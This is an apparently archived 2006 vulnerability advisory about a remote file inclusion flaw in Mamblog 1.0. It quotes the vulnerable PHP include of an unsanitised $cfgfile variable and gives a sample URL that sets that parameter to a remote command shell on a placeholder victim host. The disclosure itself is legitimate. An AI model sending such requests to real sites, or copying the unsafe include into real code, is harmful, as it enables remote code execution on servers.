Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13124
HistoryJun 13, 2006 - 12:00 a.m.

Mamblog 1.0 Version - Remote File Include Vulnerabilities

2006-06-1300:00:00
vulners.com
13

SaVSaK.CoM | SpC-x - The-BeKiR |

Mamblog 1.0 Version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : Mamblog

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

$cfgfile = "$mosConfig_absolute_path/components/$option/configuration.php";

include_once( $cfgfile );

Vulnerable :

http://www.victim.com/Mamblog/admin.mamblog.php?cfgfile=Command-Shell